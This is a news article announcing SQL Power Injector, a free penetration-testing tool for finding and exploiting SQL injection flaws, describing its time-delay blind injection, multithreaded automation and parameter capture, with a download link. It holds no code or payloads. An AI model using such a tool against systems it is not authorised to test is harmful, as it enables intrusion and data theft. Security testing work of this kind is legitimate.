A new tool was released last week that helps penetration testers find SQL injection vulnerabilities.
Written by Francois Larouche, an independent application security professional, SQL Power Injector is a graphical application created in .Net 1.1 that helps penetration testers inject SQL commands on a Web page.
For now it is SQL Server-, Oracle- and MySQL-compliant, but it is possible to use it with any existing database management system (DBMS) when using the inline injection (Normal mode).
Inline SQL injection is a significant part of SQL Power Injector, but the tool's main strength is in the multithreaded automation of the injection. Not only is it possible to automate tedious and time-consuming queries, but you can also modify the query to get only what you want.
The automation can be done two ways: comparing the expected result or by time delay. "The first way is generally compared against an error or difference between positive condition with a negative one, and the second way will turn out positive if the time delay sent to the server equals to the one parameterized in the application," Larouche said in his announcement of the tool.
Larouche said his goal was to make it as easy as possible to find and exploit a SQL injection vulnerability without having to use a browser. That is why, he said, an integrated browser displays the results of the injection parameterized in a way that any related standard SQL error will be displayed without the rest of the page.
"Another important part of this application is its power to get all the parameters you need to test the SQL injection, either by GET or POST method," Larouche said. With that, one won't need to use several applications or a proxy to intercept the data. Everything is automated, he said.
Larouche warned that SQL Power Injector won't find SQL injection vulnerabilities for you or find the right syntax if one found. "Its main strength is to provide a way to find them more easily, and once they are found to automate it in a way that you won't need to make every single injection if the only way to inject is using the blind technique," he said.
He also said he didn't intend to make the tool a database-pumping application. "There are plenty of good applications for that. In any case, many pumped data are not relevant, and since it takes time to pump it can be a real waste of time. It's better to refine and get what you really want," he said.
Larouche acknowledged that there are other tools out there that do similar things, but he said SQL Power Injector differs in that it offers the following:
- Fine-tuning parameters SQL injection
- Time delay feature
- Multithread feature
- Response results in a customized browser
SQL Power Injector is available for free at http://www.sqlpowerinjector.com/download.htm. Note that it is Version 1 of the application, and Larouche is aware it has a few bugs. However, the tool is a work in progress and Larouche will constantly be updating it.